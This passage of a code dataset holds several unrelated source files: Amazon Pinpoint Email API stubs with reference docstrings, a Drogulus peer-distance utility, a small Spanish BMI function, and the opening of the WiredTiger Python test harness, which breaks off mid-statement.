If you haven't set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_feedback_attributes(\n EmailIdentity='string',\n EmailForwardingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to configure bounce and complaint feedback forwarding for.\n :type EmailForwardingEnabled: boolean\n :param EmailForwardingEnabled:\n Sets the feedback forwarding configuration for the identity.\n If the value is ``true`` , Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you set this value to ``false`` , Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic or another event destination. You\\'re required to have a method of tracking bounces and complaints. If you haven\\'t set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_mail_from_attributes(self, EmailIdentity: str, MailFromDomain: str = None, BehaviorOnMxFailure: str = None) -> Dict:\n \"\"\"\n Used to enable or disable the custom Mail-From domain configuration for an email identity.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_mail_from_attributes(\n EmailIdentity='string',\n MailFromDomain='string',\n BehaviorOnMxFailure='USE_DEFAULT_VALUE'|'REJECT_MESSAGE'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The verified email identity that you want to set up the custom MAIL FROM domain for.\n :type MailFromDomain: string\n :param MailFromDomain:\n The custom MAIL FROM domain that you want the verified identity to use. The MAIL FROM domain must meet the following criteria:\n * It has to be a subdomain of the verified identity.\n * It can\\'t be used to receive email.\n * It can\\'t be used in a \\\"From\\\" address if the MAIL FROM domain is a destination for feedback forwarding emails.\n :type BehaviorOnMxFailure: string\n :param BehaviorOnMxFailure:\n The action that you want Amazon Pinpoint to take if it can\\'t read the required MX record when you send an email. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. 
When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn\\'t attempt to deliver the email.\n These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def send_email(self, Destination: Dict, Content: Dict, FromEmailAddress: str = None, ReplyToAddresses: List = None, FeedbackForwardingEmailAddress: str = None, EmailTags: List = None, ConfigurationSetName: str = None) -> Dict:\n \"\"\"\n Sends an email message. You can use the Amazon Pinpoint Email API to send two types of messages:\n * **Simple** – A standard email message. When you create this type of message, you specify the sender, the recipient, and the message body, and Amazon Pinpoint assembles the message for you. \n * **Raw** – A raw, MIME-formatted email message. When you send this type of email, you have to specify all of the message headers, as well as the message body. You can use this message type to send messages that contain attachments. The message that you specify has to be a valid MIME message. \n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.send_email(\n FromEmailAddress='string',\n Destination={\n 'ToAddresses': [\n 'string',\n ],\n 'CcAddresses': [\n 'string',\n ],\n 'BccAddresses': [\n 'string',\n ]\n },\n ReplyToAddresses=[\n 'string',\n ],\n FeedbackForwardingEmailAddress='string',\n Content={\n 'Simple': {\n 'Subject': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Body': {\n 'Text': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Html': {\n 'Data': 'string',\n 'Charset': 'string'\n }\n }\n },\n 'Raw': {\n 'Data': b'bytes'\n }\n },\n EmailTags=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'MessageId': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A unique message ID that you receive when Amazon Pinpoint accepts an email for sending.\n - **MessageId** *(string) --* \n A unique identifier for the message that is generated when Amazon Pinpoint accepts the message.\n .. note::\n It is possible for Amazon Pinpoint to accept a message without sending it. This can happen when the message you're trying to send has an attachment doesn't pass a virus check, or when you send a templated email that contains invalid personalization content, for example.\n :type FromEmailAddress: string\n :param FromEmailAddress:\n The email address that you want to use as the \\\"From\\\" address for the email. The address that you specify has to be verified.\n :type Destination: dict\n :param Destination: **[REQUIRED]**\n An object that contains the recipients of the email message.\n - **ToAddresses** *(list) --*\n An array that contains the email addresses of the \\\"To\\\" recipients for the email.\n - *(string) --*\n - **CcAddresses** *(list) --*\n An array that contains the email addresses of the \\\"CC\\\" (carbon copy) recipients for the email.\n - *(string) --*\n - **BccAddresses** *(list) --*\n An array that contains the email addresses of the \\\"BCC\\\" (blind carbon copy) recipients for the email.\n - *(string) --*\n :type ReplyToAddresses: list\n :param ReplyToAddresses:\n The \\\"Reply-to\\\" email addresses for the message. 
When the recipient replies to the message, each Reply-to address receives the reply.\n - *(string) --*\n :type FeedbackForwardingEmailAddress: string\n :param FeedbackForwardingEmailAddress:\n The address that Amazon Pinpoint should send bounce and complaint notifications to.\n :type Content: dict\n :param Content: **[REQUIRED]**\n An object that contains the body of the message. You can send either a Simple message or a Raw message.\n - **Simple** *(dict) --*\n The simple email message. The message consists of a subject and a message body.\n - **Subject** *(dict) --* **[REQUIRED]**\n The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 `__ .\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Body** *(dict) --* **[REQUIRED]**\n The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.\n - **Text** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that don\\'t support HTML, or clients where the recipient has disabled HTML rendering.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Html** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Raw** *(dict) --*\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * If you include attachments, they must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n - **Data** *(bytes) --* **[REQUIRED]**\n The raw email message. 
The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * Attachments must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n :type EmailTags: list\n :param EmailTags:\n A list of tags, in the form of name/value pairs, to apply to an email that you send using the ``SendEmail`` operation. Tags correspond to characteristics of the email that you define, so that you can publish email sending events.\n - *(dict) --*\n Contains the name and value of a tag that you apply to an email. You can use message tags when you publish email sending events.\n - **Name** *(string) --* **[REQUIRED]**\n The name of the message tag. The message tag name has to meet the following criteria:\n * It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **Value** *(string) --* **[REQUIRED]**\n The value of the message tag. The message tag value has to meet the following criteria:\n * It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n :type ConfigurationSetName: string\n :param ConfigurationSetName:\n The name of the configuration set that you want to use when sending the email.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def tag_resource(self, ResourceArn: str, Tags: List) -> Dict:\n \"\"\"\n Add one or more tags (keys and values) to one or more specified resources. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for more specific tag values. A tag value acts as a descriptor within a tag key.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.tag_resource(\n ResourceArn='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to add one or more tags to.\n :type Tags: list\n :param Tags: **[REQUIRED]**\n A list of the tags that you want to add to the resource. A tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` ). The maximum length of a tag key is 128 characters. The maximum length of a tag value is 256 characters.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. 
Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def untag_resource(self, ResourceArn: str, TagKeys: List) -> Dict:\n \"\"\"\n Remove one or more tags (keys and values) from a specified resource.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.untag_resource(\n ResourceArn='string',\n TagKeys=[\n 'string',\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to remove one or more tags from.\n :type TagKeys: list\n :param TagKeys: **[REQUIRED]**\n The tags (tag keys) that you want to remove from the resource. When you specify a tag key, the action removes both that key and its associated tag value.\n To remove more than one tag from the resource, append the ``TagKeys`` parameter and argument for each additional tag to remove, separated by an ampersand. 
For example: ``/v1/email/tags?ResourceArn=ResourceArn&TagKeys=Key1&TagKeys=Key2``\n - *(string) --*\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def update_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str, EventDestination: Dict) -> Dict:\n \"\"\"\n Update the configuration of an event destination for a configuration set.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.update_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string',\n EventDestination={\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n }\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination that you want to modify.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n The name of the event destination that you want to modify.\n :type EventDestination: dict\n :param EventDestination: **[REQUIRED]**\n An object that defines the event destination.\n - **Enabled** *(boolean) --*\n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren\\'t sent to the specified destinations.\n - **MatchingEventTypes** *(list) --*\n An array that specifies which events Amazon Pinpoint should send to the destinations in this ``EventDestinationDefinition`` .\n - *(string) --*\n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --*\n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --*\n An object that defines an Amazon CloudWatch destination for email events. 
You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* **[REQUIRED]**\n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --*\n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* **[REQUIRED]**\n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **DimensionValueSource** *(string) --* **[REQUIRED]**\n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* **[REQUIRED]**\n The default value of the dimension that is published to Amazon CloudWatch if you don\\'t provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **SnsDestination** *(dict) --*\n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notifications when certain email events occur.\n - **TopicArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --*\n An object that defines an Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --*\n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n"} {"ext": "py", "sha": "1a2fdcd5621eb97edc60c038cd9ce943d5bb93d9", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nContains generic utility functions used in various different parts of\nDrogulus.\n\"\"\"\nfrom .constants import K\n\n\ndef distance(key_one, key_two):\n \"\"\"\n Calculate the XOR result between two string representations of hex values.\n Returned as an int.\n \"\"\"\n val_key_one = int(key_one, 16)\n val_key_two = int(key_two, 16)\n return val_key_one ^ val_key_two\n\n\ndef sort_peer_nodes(peer_nodes, target_key):\n \"\"\"\n Given a list of peer nodes, efficiently sorts it so that the peers closest\n to the target key are at the head.
If the list is longer than K then only\n the K closest contacts will be returned.\n \"\"\"\n def node_key(node, target_key=target_key):\n \"\"\"\n Returns the node's distance to the target key.\n \"\"\"\n return distance(node.network_id, target_key)\n\n peer_nodes.sort(key=node_key)\n return peer_nodes[:K]\n"} {"ext": "py", "sha": "1a2fdd0290f3811fe758653f2b1b5980f836138d", "content": "def imc (peso,altura):\n valor = peso / altura **2\n if valor <18:\n return \"Delgadez\"\n elif valor <25:\n return \"Normal\"\n elif valor <29:\n return \"Sobrepeso\"\n else:\n return \"Obesidad\"\n \nvalor_imc = imc (58,1.55)\nprint (valor_imc)\n\n"} {"ext": "py", "sha": "1a2fddce03107c1b6356b81174debceb05409fdc", "content": "#!/usr/bin/env python\n#\n# Public Domain 2014-2018 MongoDB, Inc.\n# Public Domain 2008-2014 WiredTiger, Inc.\n#\n# This is free and unencumbered software released into the public domain.\n#\n# Anyone is free to copy, modify, publish, use, compile, sell, or\n# distribute this software, either in source code form or as a compiled\n# binary, for any purpose, commercial or non-commercial, and by any\n# means.\n#\n# In jurisdictions that recognize copyright laws, the author or authors\n# of this software dedicate any and all copyright interest in the\n# software to the public domain. We make this dedication for the benefit\n# of the public at large and to the detriment of our heirs and\n# successors. We intend this dedication to be an overt act of\n# relinquishment in perpetuity of all present and future rights to this\n# software under copyright law.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# WiredTigerTestCase\n# parent class for all test cases\n#\n\n# If unittest2 is available, use it in preference to (the old) unittest\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom contextlib import contextmanager\nimport glob, os, re, shutil, sys, time, traceback\nimport wiredtiger, wtscenario\n\ndef shortenWithEllipsis(s, maxlen):\n if len(s) > maxlen:\n s = s[0:maxlen-3] + '...'\n return s\n\nclass CapturedFd(object):\n \"\"\"\n CapturedFd encapsulates a file descriptor (e.g. 1 or 2) that is diverted\n to a file. We use this to capture and check the C stdout/stderr.\n Meanwhile we reset Python's sys.stdout, sys.stderr, using duped copies\n of the original 1, 2 fds. The end result is that Python's sys.stdout\n sys.stderr behave normally (e.g. 
go to the tty), while the C stdout/stderr\n ends up in a file that we can verify.\n \"\"\"\n def __init__(self, filename, desc):\n self.filename = filename\n self.desc = desc\n self.expectpos = 0\n self.file = None\n\n def readFileFrom(self, filename, pos, maxchars):\n \"\"\"\n Read a file starting at a given position,\n returning the beginning of its contents\n \"\"\"\n with open(filename, 'r') as f:\n f.seek(pos)\n return shortenWithEllipsis(f.read(maxchars+1), maxchars)\n\n def capture(self):\n \"\"\"\n Start capturing the file descriptor.\n Note that the original targetFd is closed, we expect\n that the caller has duped it and passed the dup to us\n in the constructor.\n \"\"\"\n self.file = open(self.filename, 'w')\n return self.file\n\n def release(self):\n \"\"\"\n Stop capturing.\n \"\"\"\n self.file.close()\n self.file = None\n\n def check(self, testcase):\n \"\"\"\n Check to see that there is no unexpected output in the captured output\n file. If there is, raise it as a test failure.\n This is generally called after 'release' is called.\n \"\"\"\n if self.file != None:\n self.file.flush()\n filesize = os.path.getsize(self.filename)\n if filesize > self.expectpos:\n contents = self.readFileFrom(self.filename, self.expectpos, 10000)\n WiredTigerTestCase.prout('ERROR: ' + self.filename +\n ' unexpected ' + self.desc +\n ', contains:\\n\"' + contents + '\"')\n testcase.fail('unexpected ' + self.desc + ', contains: \"' +\n contents + '\"')\n self.expectpos = filesize\n\n def checkAdditional(self, testcase, expect):\n \"\"\"\n Check to see that an additional string has been added to the\n output file. If it has not, raise it as a test failure.\n In any case, reset the expected pos to account for the new output.\n \"\"\"\n if self.file != None:\n self.file.flush()\n gotstr = self.readFileFrom(self.filename, self.expectpos, 1000)\n testcase.assertEqual(gotstr, expect, 'in ' + self.desc +\n ', expected \"' + expect + '\", but got \"' +\n gotstr + '\"')\n self.expectpos = os.path.getsize(self.filename)\n\n def checkAdditionalPattern(self, testcase, pat):\n \"\"\"\n Check to see that an additional string has been added to the\n output file. 
If it has not, raise it as a test failure.\n In any case, reset the expected pos to account for the new output.\n \"\"\"\n if self.file != None:\n self.file.flush()\n gotstr = self.readFileFrom(self.filename, self.expectpos, 1000)\n if re.search(pat, gotstr) == None:\n testcase.fail('in ' + self.desc +\n ', expected pattern \"' + pat + '\", but got \"' +\n gotstr + '\"')\n self.expectpos = os.path.getsize(self.filename)\n\nclass TestSuiteConnection(object):\n def __init__(self, conn, connlist):\n connlist.append(conn)\n self._conn = conn\n self._connlist = connlist\n\n def close(self, config=''):\n self._connlist.remove(self._conn)\n return self._conn.close(config)\n\n # Proxy everything except what we explicitly define to the\n # wrapped connection\n def __getattr__(self, attr):\n if attr in self.__dict__:\n return getattr(self, attr)\n else:\n return getattr(self._conn, attr)\n\n# Just like a list of strings, but with a convenience function\nclass ExtensionList(list):\n skipIfMissing = False\n def extension(self, dirname, name, extarg=None):\n if name != None and name != 'none':\n ext = '' if extarg == None else '=' + extarg\n self.append(dirname + '/' + name + ext)\n\nclass WiredTigerTestCase(unittest.TestCase):\n _globalSetup = False\n _printOnceSeen = {}\n\n # conn_config can be overridden to add to basic connection configuration.\n # Can be a string or a callable function or lambda expression.\n conn_config = ''\n\n # session_config can be overridden to add to basic session configuration.\n # Can be a string or a callable function or lambda expression.\n session_config = ''\n\n # conn_extensions can be overridden to add a list of extensions to load.\n # Each entry is a string (directory and extension name) and optional config.\n # Example:\n # conn_extensions = ('extractors/csv_extractor',\n # 'test/fail_fs={allow_writes=100}')\n conn_extensions = ()\n\n @staticmethod\n def globalSetup(preserveFiles = False, useTimestamp = False,\n gdbSub = False, lldbSub = False, verbose = 1, builddir = None, dirarg = None,\n longtest = False):\n WiredTigerTestCase._preserveFiles = preserveFiles\n d = 'WT_TEST' if dirarg == None else dirarg\n if useTimestamp:\n d += '.' 
+ time.strftime('%Y%m%d-%H%M%S', time.localtime())\n shutil.rmtree(d, ignore_errors=True)\n os.makedirs(d)\n wtscenario.set_long_run(longtest)\n WiredTigerTestCase._parentTestdir = d\n WiredTigerTestCase._builddir = builddir\n WiredTigerTestCase._origcwd = os.getcwd()\n WiredTigerTestCase._resultfile = open(os.path.join(d, 'results.txt'), \"w\", 0) # unbuffered\n WiredTigerTestCase._gdbSubprocess = gdbSub\n WiredTigerTestCase._lldbSubprocess = lldbSub\n WiredTigerTestCase._longtest = longtest\n WiredTigerTestCase._verbose = verbose\n WiredTigerTestCase._dupout = os.dup(sys.stdout.fileno())\n WiredTigerTestCase._stdout = sys.stdout\n WiredTigerTestCase._stderr = sys.stderr\n WiredTigerTestCase._concurrent = False\n WiredTigerTestCase._globalSetup = True\n WiredTigerTestCase._ttyDescriptor = None\n\n def fdSetUp(self):\n self.captureout = CapturedFd('stdout.txt', 'standard output')\n self.captureerr = CapturedFd('stderr.txt', 'error output')\n sys.stdout = self.captureout.capture()\n sys.stderr = self.captureerr.capture()\n\n def fdTearDown(self):\n # restore stderr/stdout\n self.captureout.release()\n self.captureerr.release()\n sys.stdout = WiredTigerTestCase._stdout\n sys.stderr = WiredTigerTestCase._stderr\n\n def __init__(self, *args, **kwargs):\n if hasattr(self, 'scenarios'):\n assert(len(self.scenarios) == len(dict(self.scenarios)))\n unittest.TestCase.__init__(self, *args, **kwargs)\n if not self._globalSetup:\n WiredTigerTestCase.globalSetup()\n\n def __str__(self):\n # when running with scenarios, if the number_scenarios() method\n # is used, then each scenario is given a number, which can\n # help distinguish tests.\n scen = ''\n if hasattr(self, 'scenario_number') and hasattr(self, 'scenario_name'):\n scen = ' -s ' + str(self.scenario_number) + \\\n ' (' + self.scenario_name + ')'\n return self.simpleName() + scen\n\n def shortDesc(self):\n ret_str = ''\n if hasattr(self, 'scenario_number'):\n ret_str = ' -s ' + str(self.scenario_number)\n return self.simpleName() + ret_str\n\n def simpleName(self):\n return \"%s.%s.%s\" % (self.__module__,\n self.className(), self._testMethodName)\n\n # Return the wiredtiger_open extension argument for\n # any needed shared library.\n def extensionsConfig(self):\n exts = self.conn_extensions\n if hasattr(exts, '__call__'):\n exts = ExtensionList()\n self.conn_extensions(exts)\n result = ''\n extfiles = {}\n skipIfMissing = False\n if hasattr(exts, 'skip_if_missing'):\n skipIfMissing = exts.skip_if_missing\n for ext in exts:\n extconf = ''\n if '=' in ext:\n splits = ext.split('=', 1)\n ext = splits[0]\n extconf = '=' + splits[1]\n splits = ext.split('/')\n if len(splits) != 2:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": extension is not named /\")\n libname = splits[1]\n dirname = splits[0]\n pat = os.path.join(WiredTigerTestCase._builddir, 'ext',\n dirname, libname, '.libs', 'libwiredtiger_*.so')\n filenames = glob.glob(pat)\n if len(filenames) == 0:\n if skipIfMissing:\n self.skipTest('extension \"' + ext + '\" not built')\n continue\n else:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": no extensions library found matching: \" + pat)\n elif len(filenames) > 1:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": multiple extensions libraries found matching: \" + pat)\n complete = '\"' + filenames[0] + '\"' + extconf\n if ext in extfiles:\n if extfiles[ext] != complete:\n raise Exception(self.shortid() +\n \": non-matching extension arguments in \" +\n str(exts))\n else:\n extfiles[ext] = complete\n if 
len(extfiles) != 0:\n result = ',extensions=[' + ','.join(extfiles.values()) + ']'\n return result\n\n # Can be overridden, but first consider setting self.conn_config\n # or self.conn_extensions\n def setUpConnectionOpen(self, home):\n self.home = home\n config = self.conn_config\n if hasattr(config, '__call__'):\n config = self.conn_config()\n config += self.extensionsConfig()\n # In case the open starts additional threads, flush first to\n # avoid confusion.\n sys.stdout.flush()\n conn_param = 'create,error_prefix=\"%s\",%s' % (self.shortid(), config)\n try:\n conn = self.wiredtiger_open(home, conn_param)\n except wiredtiger.WiredTigerError as e:\n print \"Failed wiredtiger_open: dir '%s', config '%s'\" % \\\n (home, conn_param)\n raise e\n self.pr(`conn`)\n return conn\n\n # Replacement for wiredtiger.wiredtiger_open that returns\n # a proxied connection that knows to close it itself at the\n # end of the run, unless it was already closed.\n def wiredtiger_open(self, home=None, config=''):\n conn = wiredtiger.wiredtiger_open(home, config)\n return TestSuiteConnection(conn, self._connections)\n\n # Can be overridden, but first consider setting self.session_config\n def setUpSessionOpen(self, conn):\n config = self.session_config\n if hasattr(config, '__call__'):\n config = self.session_config()\n return conn.open_session(config)\n\n # Can be overridden\n def close_conn(self, config=''):\n \"\"\"\n Close the connection if already open.\n \"\"\"\n if self.conn != None:\n self.conn.close(config)\n self.conn = None\n\n def open_conn(self, directory=\".\", config=None):\n \"\"\"\n Open the connection if already closed.\n \"\"\"\n if self.conn == None:\n if config != None:\n self._old_config = self.conn_config\n self.conn_config = config\n self.conn = self.setUpConnectionOpen(directory)\n if config != None:\n self.conn_config = self._old_config\n self.session = self.setUpSessionOpen(self.conn)\n\n def reopen_conn(self, directory=\".\", config=None):\n \"\"\"\n Reopen the connection.\n \"\"\"\n self.close_conn()\n self.open_conn(directory, config)\n\n def setUp(self):\n if not hasattr(self.__class__, 'wt_ntests'):\n self.__class__.wt_ntests = 0\n if WiredTigerTestCase._concurrent:\n self.testsubdir = self.shortid() + '.' + str(self.__class__.wt_ntests)\n else:\n self.testsubdir = self.className() + '.' 
